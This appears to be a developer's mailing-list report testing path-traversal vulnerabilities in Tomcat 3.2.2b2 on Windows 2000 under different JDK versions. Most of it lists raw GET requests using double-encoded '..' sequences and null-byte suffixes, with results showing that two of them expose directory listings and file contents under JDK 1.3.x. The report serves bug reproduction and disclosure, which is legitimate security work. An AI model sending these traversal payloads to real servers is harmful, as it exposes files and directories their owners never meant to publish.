Here's an update. I've installed JDK1.3.0 and JDK1.3.1-beta and tested the
following URLs.
All the tests were run on Win2000 using Tomcat 3.2.2b2. The only difference
between these runs was the value of the JAVA_HOME environment variable.
The security problems I could duplicate *only* occurred when using JDK1.3.x.
They *never* happened with JDK1.2.2. I was able to duplicate problems
(directory listing and file contents) for URLs using sequences of
/%252e%252e to 'escape' from the web application directory. None of the
/%2e%2e attacks worked.
I would appreciate it if others could try these URLs on other platforms to
see if their results vary. I'm going to investigate the JDK1.3 issues on
Win2000.
GET /examples/jsp/num/numguess.jsp%00
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404
GET /%252e%252e/%252e%252e/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> Directory listing
JDK1.3.1 --> Directory listing
GET /examples/jsp/num/numguess.js%2570
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404
GET /%2e%2e/%2e%2e/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404
GET /%2e%2e/%2e%2e%5cLICENSE/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> 404
JDK1.3.1 --> 404
GET /%252e%252e/%252e%252e%5cLICENSE/%00.jsp
JDK1.2.2 --> 404
JDK1.3.0 --> File contents
JDK1.3.1 --> File contents
